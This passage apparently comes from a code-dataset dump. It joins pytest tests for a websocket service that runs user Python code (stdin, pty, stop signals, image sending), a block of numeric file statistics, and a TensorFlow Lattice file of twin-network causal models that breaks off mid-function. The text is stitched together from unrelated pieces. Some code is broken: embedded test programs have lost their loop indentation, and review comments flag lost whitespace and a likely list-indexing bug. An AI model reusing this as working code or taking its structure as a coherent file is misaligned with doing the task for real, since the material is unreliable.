    start_cmd = create_message("start", {"sourceScript": code})
    await run_py_ws_client.send_str(start_cmd)
    await receive_data(run_py_ws_client, "started")
    await asyncio.sleep(0.1)  # wait for data
    message = await run_py_ws_client.receive()
    m_type, m_data, m_process = parse_message(message.data)
    assert m_type == "stderr"
    # Expected shape of a CPython SyntaxError traceback (the exact message
    # text is interpreter-version dependent).
    # NOTE(review): leading whitespace inside these expected strings may have
    # been lost in formatting - confirm against upstream.
    lines = m_data["output"].split("\n")
    assert lines[0].startswith(" File")
    assert lines[1] == " i'm not valid python"
    assert lines[2] == " ^"
    assert lines[3] == "SyntaxError: EOL while scanning string literal"
    await wait_for_data(run_py_ws_client, "stopped", "exitCode", 1)
@pytest.mark.asyncio
async def test_input(run_py_ws_client):
    """stdin messages are fed to the running process and stdout echoed back."""
    # NOTE(review): indentation inside this code string may have been lost
    # in formatting - confirm against upstream.
    code = """s = input()
while "BYE" != s:
print(["HUH?! SPEAK UP, SONNY!","NO, NOT SINCE 1930"][s.isupper()])
s = input()"""
    start_cmd = create_message("start", {"sourceScript": code})
    await run_py_ws_client.send_str(start_cmd)
    await receive_data(run_py_ws_client, "started")
    # Lower-case input -> first canned reply.
    user_input = create_message("stdin", {"input": "hello\n"})
    await run_py_ws_client.send_str(user_input)
    await wait_for_data(
        run_py_ws_client, "stdout", "output", "HUH?! SPEAK UP, SONNY!\n"
    )
    # Upper-case input -> second canned reply.
    user_input = create_message("stdin", {"input": "HEY GRANDMA\n"})
    await run_py_ws_client.send_str(user_input)
    await wait_for_data(run_py_ws_client, "stdout", "output", "NO, NOT SINCE 1930\n")
    # "BYE" terminates the loop and the process.
    user_input = create_message("stdin", {"input": "BYE\n"})
    await run_py_ws_client.send_str(user_input)
    await wait_for_data(run_py_ws_client, "stopped", "exitCode", 0)
@pytest.mark.asyncio
@pytest.mark.parametrize("query_params", [{"pty": "1"}])
async def test_input_pty(run_py_ws_client_query):
    """Same dialogue as test_input but through a pty: input is echoed back
    and line endings are CRLF."""
    # NOTE(review): indentation inside this code string may have been lost
    # in formatting - confirm against upstream.
    code = """s = input()
while "BYE" != s:
print(["HUH?! SPEAK UP, SONNY!","NO, NOT SINCE 1930"][s.isupper()])
s = input()"""
    start_cmd = create_message("start", {"sourceScript": code})
    await run_py_ws_client_query.send_str(start_cmd)
    await receive_data(run_py_ws_client_query, "started")
    user_input = create_message("stdin", {"input": "hello\r"})
    await run_py_ws_client_query.send_str(user_input)
    # The pty echoes the typed line before the program's reply.
    await wait_for_data(
        run_py_ws_client_query,
        "stdout",
        "output",
        "hello\r\nHUH?! SPEAK UP, SONNY!\r\n",
    )
    user_input = create_message("stdin", {"input": "HEY GRANDMA\r"})
    await run_py_ws_client_query.send_str(user_input)
    await wait_for_data(
        run_py_ws_client_query,
        "stdout",
        "output",
        "HEY GRANDMA\r\nNO, NOT SINCE 1930\r\n",
    )
    user_input = create_message("stdin", {"input": "BYE\r"})
    await run_py_ws_client_query.send_str(user_input)
    await wait_for_data(run_py_ws_client_query, "stdout", "output", "BYE\r\n")
    await wait_for_data(run_py_ws_client_query, "stopped", "exitCode", 0)
@pytest.mark.asyncio
async def test_two_clients(run_py_ws_client):
    """Two websocket clients run and stop fully independent processes."""
    async with aiohttp.ClientSession() as session2:
        async with session2.ws_connect(RUN_PY_URL) as client2:
            start_cmd = create_message("start", {"sourceScript": "while True: pass"})
            # Start a process on each connection.
            for client in (run_py_ws_client, client2):
                await client.send_str(start_cmd)
                await receive_data(client, "started")
            # Stopping one must not affect the other.
            for client in (run_py_ws_client, client2):
                await client.send_str(create_message("stop"))
                await wait_for_data(client, "stopped", "exitCode", -15, 100)
@pytest.mark.asyncio
async def test_out_of_order_commands(run_py_ws_client):
    """Commands sent in an invalid state are rejected with a 'Bad message' error."""
    ws = run_py_ws_client

    # stdin before anything is running is rejected
    await ws.send_str(create_message("stdin", {"input": "hello\n"}))
    await receive_data(ws, "error", "message", "Bad message")

    # stop with nothing running is rejected
    await ws.send_str(create_message("stop"))
    await receive_data(ws, "error", "message", "Bad message")

    # a first start succeeds
    start_cmd = create_message("start", {"sourceScript": "while True: pass"})
    await ws.send_str(start_cmd)
    await receive_data(ws, "started")

    # a second start while already running is rejected
    await ws.send_str(start_cmd)
    await receive_data(ws, "error", "message", "Bad message")

    # stop terminates the process (SIGTERM -> -15)
    await ws.send_str(create_message("stop"))
    await wait_for_data(ws, "stopped", "exitCode", -15)

    # stopping again after exit is rejected
    await ws.send_str(create_message("stop"))
    await receive_data(ws, "error", "message", "Bad message")
@pytest.mark.asyncio
async def test_discard_old_input(run_py_ws_client):
    """Unconsumed stdin from a finished run is not delivered to the next run."""
    ws = run_py_ws_client

    # First run never reads stdin; leave an unterminated line behind.
    await ws.send_str(create_message("start", {"sourceScript": 'print("hello world")'}))
    await receive_data(ws, "started")
    await ws.send_str(create_message("stdin", {"input": "unterminated input"}))
    await wait_for_data(ws, "stdout", "output", "hello world\n", 100)
    await wait_for_data(ws, "stopped", "exitCode", 0)

    # Second run must only see input sent after it started.
    await ws.send_str(create_message("start", {"sourceScript": "print(input())"}))
    await receive_data(ws, "started")
    await ws.send_str(create_message("stdin", {"input": "hello\n"}))
    await wait_for_data(ws, "stdout", "output", "hello\n")
    await wait_for_data(ws, "stopped", "exitCode", 0)
@pytest.mark.asyncio
async def test_use_lib(run_py_ws_client):
    """User code can import the bundled further_link helper library."""
    source = """\
from further_link import __version__
print(__version__)
"""
    await run_py_ws_client.send_str(create_message("start", {"sourceScript": source}))
    await receive_data(run_py_ws_client, "started")
    # The child process must report the same library version as this test host.
    await wait_for_data(run_py_ws_client, "stdout", "output", f"{__version__}\n")
    await wait_for_data(run_py_ws_client, "stopped", "exitCode", 0)
@pytest.mark.asyncio
@pytest.mark.skipif("DISPLAY" not in os.environ, reason="requires UI")
async def test_use_display(run_py_ws_client):
    """Graphical user code (turtle) runs to completion when a display exists."""
    source = """\
from turtle import color
color('red')
"""
    await run_py_ws_client.send_str(create_message("start", {"sourceScript": source}))
    await receive_data(run_py_ws_client, "started")
    # Generous 5s timeout: turtle has to open a window before exiting cleanly.
    await wait_for_data(run_py_ws_client, "stopped", "exitCode", 0, 5000)
@pytest.mark.asyncio
@pytest.mark.skip(reason="Temporarily disabled - to be fixed")
async def test_keyevent(run_py_ws_client):
    """Key events from the client are forwarded to KeyboardButton handlers."""
    source = """\
from further_link import KeyboardButton
from signal import pause
a = KeyboardButton('a')
b = KeyboardButton('b')
a.when_pressed = lambda: print('a pressed')
b.when_released = lambda: print('b released')
pause()
"""
    ws = run_py_ws_client
    await ws.send_str(create_message("start", {"sourceScript": source}))
    await wait_for_data(ws, "started")

    # The program announces which keys it listens for.
    await wait_for_data(ws, "keylisten", "output", "a")
    await wait_for_data(ws, "keylisten", "output", "b")

    # Each injected event triggers the matching handler's print.
    for key, event, expected in (
        ("a", "keydown", "a pressed\n"),
        ("b", "keyup", "b released\n"),
    ):
        await ws.send_str(create_message("keyevent", {"key": key, "event": event}))
        await wait_for_data(ws, "stdout", "output", expected)

    await ws.send_str(create_message("stop"))
    await wait_for_data(ws, "stopped", "exitCode", -15)
# Base64 of a minimal 1x1 JPEG: the exact "video" payload that send_image is
# expected to produce for a 1x1 zero-noise test image in the tests below.
jpeg_pixel_b64 = "/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/wAALCAABAAEBAREA/8QAFAABAAAAAAAAAAAAAAAAAAAAAP/EABQQAQAAAAAAAAAAAAAAAAAAAAD/2gAIAQEAAD8AP//Z" # noqa: E501
@pytest.mark.asyncio
async def test_send_image_pil(run_py_ws_client):
    """send_image with a PIL image emits the expected base64 JPEG 'video' frame."""
    source = """\
from further_link import send_image
from PIL.Image import effect_noise
send_image(effect_noise((1, 1), 0))
"""
    await run_py_ws_client.send_str(create_message("start", {"sourceScript": source}))
    await wait_for_data(run_py_ws_client, "started")
    await wait_for_data(run_py_ws_client, "video", "output", jpeg_pixel_b64)
    await wait_for_data(run_py_ws_client, "stopped", "exitCode", 0)
@pytest.mark.asyncio
async def test_send_image_opencv(run_py_ws_client):
    """send_image also accepts a numpy array (OpenCV-style image)."""
    source = """\
from numpy import array
from further_link import send_image
from PIL.Image import effect_noise
send_image(array(effect_noise((1, 1), 0)))
"""
    await run_py_ws_client.send_str(create_message("start", {"sourceScript": source}))
    await wait_for_data(run_py_ws_client, "started")
    await wait_for_data(run_py_ws_client, "video", "output", jpeg_pixel_b64)
    await wait_for_data(run_py_ws_client, "stopped", "exitCode", 0)
@pytest.mark.asyncio
async def test_send_image_with_directory(run_py_ws_client):
    """send_image works when the run is given a working directory name."""
    source = """\
from further_link import send_image
from PIL.Image import effect_noise
send_image(effect_noise((1, 1), 0))
"""
    start_cmd = create_message(
        "start", {"sourceScript": source, "directoryName": "my-dirname"}
    )
    await run_py_ws_client.send_str(start_cmd)
    await wait_for_data(run_py_ws_client, "started")
    await wait_for_data(run_py_ws_client, "video", "output", jpeg_pixel_b64)
    await wait_for_data(run_py_ws_client, "stopped", "exitCode", 0)
| 31.951724
| 245
| 0.714296
| 2,055
| 13,899
| 4.451582
| 0.098783
| 0.069961
| 0.096415
| 0.17195
| 0.815369
| 0.787167
| 0.766834
| 0.75481
| 0.724749
| 0.692392
| 0
| 0.008811
| 0.158932
| 13,899
| 434
| 246
| 32.025346
| 0.773738
| 0.015253
| 0
| 0.641379
| 0
| 0
| 0.244166
| 0.033355
| 0
| 0
| 0
| 0
| 0.017241
| 1
| 0
| false
| 0.013793
| 0.086207
| 0
| 0.086207
| 0.044828
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ec4e9fa5845ea23660b46a4add4fc01ccec47886
| 21,974
|
py
|
Python
|
Kenyan_train/models_kenyan.py
|
thanosvlo/Twin_Causal_Nets
|
414e36467b610e210bf7ab3aa325d48d3d920303
|
[
"MIT"
] | 3
|
2022-02-01T15:23:27.000Z
|
2022-03-21T15:16:35.000Z
|
Kenyan_train/models_kenyan.py
|
thanosvlo/Twin_Causal_Nets
|
414e36467b610e210bf7ab3aa325d48d3d920303
|
[
"MIT"
] | null | null | null |
Kenyan_train/models_kenyan.py
|
thanosvlo/Twin_Causal_Nets
|
414e36467b610e210bf7ab3aa325d48d3d920303
|
[
"MIT"
] | null | null | null |
import sys
sys.path.append("..")
sys.path.append("../..")
import numpy as np
import tensorflow as tf
import tensorflow_lattice as tfl
def make_calibrators(data, lattice_size, units, name=None, monotonicity='none'):
    """Create a piecewise-linear calibration layer for one input feature.

    Parameters
    ----------
    data : array-like or str
        Feature values used to determine the calibration input range.
        A value without .min()/.max() (e.g. the latent-noise tag 'Uy')
        falls back to the default [0, 1] range.
    lattice_size : int
        Number of lattice vertices along this dimension; the calibrator
        output is scaled to [0, lattice_size - 1].
    units : int
        Number of parallel calibration units.
    name : str, optional
        Keras layer name.
    monotonicity : str
        Monotonicity constraint passed to tfl ('none', 'increasing', ...).

    Returns
    -------
    tfl.layers.PWLCalibration
        An uncalled calibration layer.
    """
    try:
        min_ = data.min()
        max_ = data.max()
    except (AttributeError, TypeError, ValueError):
        # Not an array (no usable .min()/.max()) -- use the default unit range.
        # (Was a bare `except:`, which also swallowed unrelated errors.)
        min_ = 0
        max_ = 1
    # The latent noise channel tagged 'Uy' spans [0, 2] instead of [0, 1].
    # isinstance guard avoids ambiguous elementwise comparison for arrays.
    if isinstance(data, str) and data == 'Uy':
        max_ = 2
    calibrator = tfl.layers.PWLCalibration(
        # Keypoints uniformly cover the observed input range.
        # For categorical variables see tfl.layers.CategoricalCalibration.
        input_keypoints=np.linspace(min_, max_, num=5),
        dtype=tf.float32,
        monotonicity=monotonicity,
        units=units,
        # Output range must correspond to the expected lattice input range.
        output_min=0.0,
        output_max=lattice_size - 1.0,
        name=name,
    )
    return calibrator
def make_multiple_calibrators(confounders, params):
    """Create one Keras Input plus calibration layer per confounder present.

    Confounders are processed in a fixed order so that ``lattice_sizes[i]``
    and ``z_monotonicity[i - 2]`` stay aligned with the lattice dimensions
    (``i`` starts at 2 because dimensions 0 and 1 belong to the treatment A
    and the latent noise Uy).

    Parameters
    ----------
    confounders : mapping / DataFrame
        Column name -> observed values for each available confounder.
    params : object
        Hyper-parameters providing lattice_sizes, z_calib_units and
        z_monotonicity.

    Returns
    -------
    (model_inputs, lattice_inputs) : (list, list)
        The Keras Input tensors and their calibrated outputs, in order.
    """
    model_inputs = []
    lattice_inputs = []
    i = 2
    # Gender is categorical and gets a CategoricalCalibration layer.
    if 'c13_c_child_gender' in confounders:
        gender_input = tf.keras.layers.Input(shape=[1], name='c13_c_child_gender')
        model_inputs.append(gender_input)
        gender_calibrator = tfl.layers.CategoricalCalibration(
            num_buckets=2,
            output_min=0.0,
            output_max=params.lattice_sizes[i] - 1.0,
            # Initializes all outputs to (output_min + output_max) / 2.0.
            kernel_initializer='constant',
            name='gender_calib',
        )(gender_input)
        i += 1
        lattice_inputs.append(gender_calibrator)
    # The remaining confounders are continuous and share one PWL pattern:
    # (column name, calibration layer name), in the original fixed order.
    continuous = [
        ('base_age', 'age_calib'),
        ('momeduc_orig', 'momeduc_calib'),
        ('splnecmpn_base', 'splnecmpn_base_calib'),
        ('e1_iron_roof_base', 'e1_iron_roof_base_calib'),
        ('hygiene_know_base', 'hygiene_know_base_calib'),
        ('latrine_density_base', 'latrine_density_base_calib'),
        ('numkids_base', 'numkids_base_calib'),
    ]
    for column, calib_name in continuous:
        if column not in confounders:
            continue
        feature_input = tf.keras.layers.Input(shape=[1], name=column)
        model_inputs.append(feature_input)
        calibrated = make_calibrators(
            confounders[column].values,
            params.lattice_sizes[i],
            params.z_calib_units,
            monotonicity=params.z_monotonicity[i - 2],
            name=calib_name,
        )(feature_input)
        i += 1
        lattice_inputs.append(calibrated)
    return model_inputs, lattice_inputs
def Single_Twin_Net_Kenyan(treatment, uy, confounders, params):
    """Build a single-branch lattice model Y = f(A, Uy, Z).

    Inputs are the treatment A (monotonically increasing calibration), a
    latent noise term Uy, and confounders Z (one input per confounder, or a
    single vector input, depending on params.multiple_confounders).
    Returns an uncompiled tf.keras Model with one output 'Y' in [0, 1].
    """
    lattice_sizes = params.lattice_sizes
    model_inputs = []
    lattice_inputs = []
    # Treatment A: calibrated with an increasing-monotonicity constraint.
    a_input = tf.keras.layers.Input(shape=[1], name='A')
    model_inputs.append(a_input)
    a_calibrator = make_calibrators(treatment.values, lattice_sizes[0], params.calib_units, monotonicity='increasing',
                                    name='a_calib')(a_input)
    lattice_inputs.append(a_calibrator)
    # Latent noise Uy.
    uy_input = tf.keras.layers.Input(shape=[1], name='Uy')
    model_inputs.append(uy_input)
    uy_calibrator = make_calibrators(uy, lattice_sizes[1], params.hidden_dims, monotonicity=params.uy_monotonicity
                                     , name='uy_name')(uy_input)
    lattice_inputs.append(uy_calibrator)
    # NOTE(review): lattice_inputs is populated but the final Lattice call
    # below uses a_calibrator/layer_uy/layer_z directly — looks like dead
    # bookkeeping; confirm before removing.
    # Confounders Z: either one input per confounder, or one vector input.
    if params.multiple_confounders:
        inputs_, z_calibrator = make_multiple_calibrators(confounders, params)
        _ = [model_inputs.append(i) for i in inputs_]
        layer_z = z_calibrator
    else:
        confounders = confounders.values
        z_input = tf.keras.layers.Input(shape=(params.len_conf,), name='Z')
        model_inputs.append(z_input)
        z_calibrator = make_calibrators(confounders, lattice_sizes[2], params.z_calib_units,
                                        monotonicity=params.z_monotonicity[0])(z_input)
        z_calibrator = [z_calibrator]
        # Z layer
        if params.z_layer == 'linear':
            # NOTE(review): z_calibrator was just wrapped in a list, yet it is
            # indexed with [..., tf.newaxis] here — this path may raise at
            # build time; verify the 'linear' z_layer config is exercised.
            z_calibrator = tf.tile(z_calibrator[..., tf.newaxis], (1, 1, params.z_calib_units))
            layer_z = tfl.layers.Linear(params.z_calib_units, units=params.z_calib_units,
                                        )(z_calibrator)
            layer_z = [layer_z]
        else:
            layer_z = z_calibrator
    # Uy layer: optional extra linear transform on the calibrated noise.
    if params.uy_layer == 'linear':
        layer_uy = tfl.layers.Linear(1, units=params.calib_units, monotonicities=params.uy_monotonicity)(uy_calibrator)
    else:
        layer_uy = uy_calibrator
    # Lattice combining A, Uy and Z with per-dimension monotonicities.
    lattice_y = tfl.layers.Lattice(
        lattice_sizes=lattice_sizes,
        units=params.lattice_units,
        monotonicities=[
            'increasing', params.uy_monotonicity, *params.z_monotonicity
        ],
        output_min=0.0,
        output_max=1.0,
        name='Y',
    )([a_calibrator, layer_uy, *layer_z])
    # Optional output transform.
    if params.end_activation == 'calib':
        lattice_y = tfl.layers.PWLCalibration(
            input_keypoints=np.linspace(0.0, 1.0, 5),
            name='output_calib',
        )(
            lattice_y)
    elif params.end_activation == 'softmax':
        lattice_y = tf.keras.layers.Softmax()(lattice_y)
    model = tf.keras.models.Model(
        inputs=model_inputs,
        outputs=lattice_y)
    return model
def Twin_Net_Kenyan(treatment, uy, confounders, params):
    """Build a twin-network causal model with factual (A) and counterfactual
    (A_prime) treatment branches sharing the noise Uy and confounders Z.

    Returns an uncompiled tf.keras Model with two outputs: Y and Y_prime.
    The combiner is either a monotonic Lattice (params.layer == 'lattice')
    or a concatenation followed by a monotonic Linear layer.
    """
    lattice_sizes = params.lattice_sizes
    model_inputs = []
    # Factual treatment A.
    a_input = tf.keras.layers.Input(shape=[1], name='A')
    model_inputs.append(a_input)
    a_calibrator = make_calibrators(treatment.values, lattice_sizes[0], params.calib_units, monotonicity='increasing',
                                    name='a_calib')(a_input)
    # Counterfactual treatment A' (same calibration pattern, separate weights).
    a_prime_input = tf.keras.layers.Input(shape=[1], name='A_prime')
    model_inputs.append(a_prime_input)
    a_prime_calibrator = make_calibrators(treatment.values, lattice_sizes[0], params.calib_units,
                                          monotonicity='increasing',
                                          name='a_prime_calib')(a_prime_input)
    # Shared latent noise Uy.
    uy_input = tf.keras.layers.Input(shape=[1], name='Uy')
    model_inputs.append(uy_input)
    uy_calibrator = make_calibrators(uy, lattice_sizes[1], params.hidden_dims, monotonicity=params.uy_monotonicity
                                     , name='uy_name')(uy_input)
    # Confounders Z: per-column inputs or one vector input.
    if params.multiple_confounders:
        inputs_, z_calibrator = make_multiple_calibrators(confounders, params)
        _ = [model_inputs.append(i) for i in inputs_]
        layer_z = z_calibrator
    else:
        confounders = confounders.values
        z_input = tf.keras.layers.Input(shape=(params.len_conf,), name='Z')
        model_inputs.append(z_input)
        z_calibrator = make_calibrators(confounders, lattice_sizes[2], params.z_calib_units,
                                        monotonicity=params.z_monotonicity[0])(z_input)
        z_calibrator = [z_calibrator]
        # Z layer
        if params.z_layer == 'linear':
            # NOTE(review): z_calibrator is a list here yet is indexed with
            # [..., tf.newaxis]; confirm this config is ever exercised.
            z_calibrator = tf.tile(z_calibrator[..., tf.newaxis], (1, 1, params.z_calib_units))
            layer_z = tfl.layers.Linear(params.z_calib_units, units=params.z_calib_units,
                                        )(z_calibrator)
            layer_z = [layer_z]
        else:
            layer_z = z_calibrator
    # Uy layer: optional linear transform on the calibrated noise.
    if params.uy_layer == 'linear':
        layer_uy = tfl.layers.Linear(1, units=params.calib_units, monotonicities=params.uy_monotonicity)(uy_calibrator)
    else:
        layer_uy = uy_calibrator
    if params.layer =='lattice':
        # Twin monotonic lattices sharing Uy and Z but with their own weights.
        lattice_y = tfl.layers.Lattice(
            lattice_sizes=lattice_sizes,
            units=params.lattice_units,
            monotonicities=[
                'increasing', params.uy_monotonicity, *params.z_monotonicity
            ],
            output_min=0.0,
            output_max=1.0,
            name='Y',
        )([a_calibrator, layer_uy, *layer_z])
        lattice_y_prime = tfl.layers.Lattice(
            lattice_sizes=lattice_sizes,
            units=params.lattice_units,
            monotonicities=[
                'increasing', params.uy_monotonicity, *params.z_monotonicity
            ],
            output_min=0.0,
            output_max=1.0,
            name='Y_prime',
        )([a_prime_calibrator, layer_uy, *layer_z])
    else:
        # Linear alternative: concatenate calibrated features per branch.
        conc_input = tf.keras.layers.Concatenate(axis=1)([a_calibrator, layer_uy, *layer_z])
        conc_input_prime = tf.keras.layers.Concatenate(axis=1)([a_prime_calibrator, layer_uy, *layer_z])
        lattice_y = tfl.layers.Linear(
            np.sum([i.shape[-1] for i in layer_z]) + lattice_sizes[0] +lattice_sizes[1] ,
            units=params.lattice_units,
            monotonicities=
            'increasing'
            ,
            name='Y',
        )(conc_input)
        lattice_y_prime = tfl.layers.Linear(
            np.sum([i.shape[-1] for i in layer_z]) + lattice_sizes[0] +lattice_sizes[1] ,
            units=params.lattice_units,
            monotonicities=
            'increasing'
            ,
            name='Y_prime',
        )(conc_input_prime)
    # Optional output transform.
    # NOTE(review): only the 'sigmoid' branch also transforms lattice_y_prime;
    # 'calib' and 'softmax' leave the counterfactual head raw — confirm intended.
    if params.end_activation == 'calib':
        lattice_y = tfl.layers.PWLCalibration(
            input_keypoints=np.linspace(0.0, 1.0, 5),
            name='output_calib',
        )(
            lattice_y)
    elif params.end_activation == 'softmax':
        lattice_y = tf.keras.layers.Softmax()(lattice_y)
    elif params.end_activation == 'sigmoid':
        lattice_y = tf.nn.sigmoid(lattice_y)
        lattice_y_prime = tf.nn.sigmoid(lattice_y_prime)
    model = tf.keras.models.Model(
        inputs=model_inputs,
        outputs=[lattice_y, lattice_y_prime])
    return model
def dice_loss(y_true, y_pred):
    """Soft Dice loss: 1 - 2*|T∩P| / (|T| + |P|), with sigmoid-activated logits.

    y_true is cast to float32; y_pred is treated as logits and passed
    through a sigmoid before the overlap is computed.
    """
    targets = tf.cast(y_true, tf.float32)
    probabilities = tf.math.sigmoid(y_pred)
    overlap = 2 * tf.reduce_sum(targets * probabilities)
    total = tf.reduce_sum(targets + probabilities)
    return 1 - overlap / total
def Twin_Net_Kenyan_with_Propensity(treatment, uy, confounders, params):
    """Twin-network model with two extra heads predicting treatment from the
    confounders alone (propensity-style outputs A_out / A_out_prime).

    Returns an uncompiled tf.keras Model with four outputs:
    [Y, Y_prime, A_out, A_out_prime].
    """
    lattice_sizes = params.lattice_sizes
    model_inputs = []
    # Factual treatment A.
    a_input = tf.keras.layers.Input(shape=[1], name='A')
    model_inputs.append(a_input)
    a_calibrator = make_calibrators(treatment.values, lattice_sizes[0], params.calib_units, monotonicity='increasing',
                                    name='a_calib')(a_input)
    # Counterfactual treatment A'.
    a_prime_input = tf.keras.layers.Input(shape=[1], name='A_prime')
    model_inputs.append(a_prime_input)
    a_prime_calibrator = make_calibrators(treatment.values, lattice_sizes[0], params.calib_units,
                                          monotonicity='increasing',
                                          name='a_prime_calib')(a_prime_input)
    # Shared latent noise Uy.
    uy_input = tf.keras.layers.Input(shape=[1], name='Uy')
    model_inputs.append(uy_input)
    uy_calibrator = make_calibrators(uy, lattice_sizes[1], params.hidden_dims, monotonicity=params.uy_monotonicity
                                     , name='uy_name')(uy_input)
    # Confounders Z.
    if params.multiple_confounders:
        inputs_, z_calibrator = make_multiple_calibrators(confounders, params)
        _ = [model_inputs.append(i) for i in inputs_]
        layer_z = z_calibrator
    else:
        confounders = confounders.values
        z_input = tf.keras.layers.Input(shape=(params.len_conf,), name='Z')
        model_inputs.append(z_input)
        z_calibrator = make_calibrators(confounders, lattice_sizes[2], params.z_calib_units,
                                        monotonicity=params.z_monotonicity[0])(z_input)
        z_calibrator = [z_calibrator]
        # Z layer
        if params.z_layer == 'linear':
            # NOTE(review): z_calibrator is a list here yet is indexed with
            # [..., tf.newaxis]; confirm this config is ever exercised.
            z_calibrator = tf.tile(z_calibrator[..., tf.newaxis], (1, 1, params.z_calib_units))
            layer_z = tfl.layers.Linear(params.z_calib_units, units=params.z_calib_units,
                                        )(z_calibrator)
            layer_z = [layer_z]
        else:
            layer_z = z_calibrator
    # Uy layer.
    if params.uy_layer == 'linear':
        layer_uy = tfl.layers.Linear(1, units=params.calib_units, monotonicities=params.uy_monotonicity)(uy_calibrator)
    else:
        layer_uy = uy_calibrator
    # Outcome heads.
    lattice_y = tfl.layers.Lattice(
        lattice_sizes=lattice_sizes,
        units=params.lattice_units,
        monotonicities=[
            'increasing', params.uy_monotonicity, *params.z_monotonicity
        ],
        output_min=0.0,
        output_max=1.0,
        name='Y',
    )([a_calibrator, layer_uy, *layer_z])
    lattice_y_prime = tfl.layers.Lattice(
        lattice_sizes=lattice_sizes,
        units=params.lattice_units,
        monotonicities=[
            'increasing', params.uy_monotonicity, *params.z_monotonicity
        ],
        output_min=0.0,
        output_max=1.0,
        name='Y_prime',
    )([a_prime_calibrator, layer_uy, *layer_z])
    # Propensity heads: built from the confounder dimensions only
    # (lattice_sizes[2:] skips the A and Uy dimensions).
    lattice_A_prime = tfl.layers.Lattice(
        lattice_sizes=lattice_sizes[2:],
        units=params.lattice_units,
        monotonicities=[
            *params.z_monotonicity
        ],
        output_min=0.0,
        output_max=1.0,
        name='A_out_prime',
    )([*layer_z])
    lattice_A = tfl.layers.Lattice(
        lattice_sizes=lattice_sizes[2:],
        units=params.lattice_units,
        monotonicities=[
            *params.z_monotonicity
        ],
        output_min=0.0,
        output_max=1.0,
        name='A_out',
    )([*layer_z])
    # Optional output transform.
    # NOTE(review): only 'sigmoid' also transforms lattice_y_prime; the
    # propensity heads are never transformed — confirm intended.
    if params.end_activation == 'calib':
        lattice_y = tfl.layers.PWLCalibration(
            input_keypoints=np.linspace(0.0, 1.0, 5),
            name='output_calib',
        )(
            lattice_y)
    elif params.end_activation == 'softmax':
        lattice_y = tf.keras.layers.Softmax()(lattice_y)
    elif params.end_activation == 'sigmoid':
        lattice_y = tf.nn.sigmoid(lattice_y)
        lattice_y_prime = tf.nn.sigmoid(lattice_y_prime)
    model = tf.keras.models.Model(
        inputs=model_inputs,
        outputs=[lattice_y, lattice_y_prime, lattice_A, lattice_A_prime])
    return model
def Twin_Net_Kenyan_with_Z_A(treatment, uy, confounders, params):
    """Twin-network variant that first fuses treatment with confounders via a
    monotonic linear layer (A·Z interaction) before the outcome combiner.

    Returns an uncompiled tf.keras Model with outputs [Y, Y_prime]. The
    combiner is either a Linear over concatenated features (params.concats)
    or a monotonic Lattice.
    """
    lattice_sizes = params.lattice_sizes
    model_inputs = []
    # Factual treatment A.
    a_input = tf.keras.layers.Input(shape=[1], name='A')
    model_inputs.append(a_input)
    a_calibrator = make_calibrators(treatment.values, lattice_sizes[0], params.calib_units, monotonicity='increasing',
                                    name='a_calib')(a_input)
    # Counterfactual treatment A'.
    a_prime_input = tf.keras.layers.Input(shape=[1], name='A_prime')
    model_inputs.append(a_prime_input)
    a_prime_calibrator = make_calibrators(treatment.values, lattice_sizes[0], params.calib_units,
                                          monotonicity='increasing',
                                          name='a_prime_calib')(a_prime_input)
    # Shared latent noise Uy.
    uy_input = tf.keras.layers.Input(shape=[1], name='Uy')
    model_inputs.append(uy_input)
    uy_calibrator = make_calibrators(uy, lattice_sizes[1], params.hidden_dims, monotonicity=params.uy_monotonicity
                                     , name='uy_name')(uy_input)
    # Confounders Z.
    if params.multiple_confounders:
        inputs_, z_calibrator = make_multiple_calibrators(confounders, params)
        _ = [model_inputs.append(i) for i in inputs_]
        layer_z = z_calibrator
    else:
        confounders = confounders.values
        z_input = tf.keras.layers.Input(shape=(params.len_conf,), name='Z')
        model_inputs.append(z_input)
        z_calibrator = make_calibrators(confounders, lattice_sizes[2], params.z_calib_units,
                                        monotonicity=params.z_monotonicity[0])(z_input)
        z_calibrator = [z_calibrator]
        # Z layer
        if params.z_layer == 'linear':
            # NOTE(review): z_calibrator is a list here yet is indexed with
            # [..., tf.newaxis]; confirm this config is ever exercised.
            z_calibrator = tf.tile(z_calibrator[..., tf.newaxis], (1, 1, params.z_calib_units))
            layer_z = tfl.layers.Linear(params.z_calib_units, units=params.z_calib_units,
                                        )(z_calibrator)
            layer_z = [layer_z]
        else:
            layer_z = z_calibrator
    # Uy layer.
    if params.uy_layer == 'linear':
        layer_uy = tfl.layers.Linear(1, units=params.calib_units, monotonicities=params.uy_monotonicity)(uy_calibrator)
    else:
        layer_uy = uy_calibrator
    # Fuse each treatment branch with Z through a single monotonic linear unit.
    conc_a_z = tf.keras.layers.Concatenate()([a_calibrator, *layer_z])
    conc_a_prime_z = tf.keras.layers.Concatenate()([a_prime_calibrator, *layer_z])
    layer_a_z = tfl.layers.Linear( np.sum([i.shape[-1] for i in layer_z]) +lattice_sizes[0], units=1, monotonicities='increasing')(conc_a_z)
    layer_a_z_prime = tfl.layers.Linear(np.sum([i.shape[-1] for i in layer_z]) +lattice_sizes[0], units=1, monotonicities='increasing')(conc_a_prime_z)
    if params.concats:
        # Linear combiner over concatenated [A·Z, Uy, Z] features.
        conc_input = tf.keras.layers.Concatenate(axis=1)([layer_a_z, layer_uy, *layer_z])
        conc_input_prime = tf.keras.layers.Concatenate(axis=1)([layer_a_z_prime, layer_uy, *layer_z])
        lattice_y = tfl.layers.Linear(
            np.sum([i.shape[-1] for i in layer_z]) + lattice_sizes[1]+1,
            units=params.lattice_units,
            monotonicities=
            'increasing'
            ,
            name='Y',
        )(conc_input)
        lattice_y_prime = tfl.layers.Linear(
            np.sum([i.shape[-1] for i in layer_z])+ lattice_sizes[1] + 1,
            units=params.lattice_units,
            monotonicities=
            'increasing'
            ,
            name='Y_prime',
        )(conc_input_prime)
    else:
        # Lattice combiner; the fused A·Z scalar takes a size-2 first dimension.
        lattice_y = tfl.layers.Lattice(
            lattice_sizes=[2,*lattice_sizes[1:]],
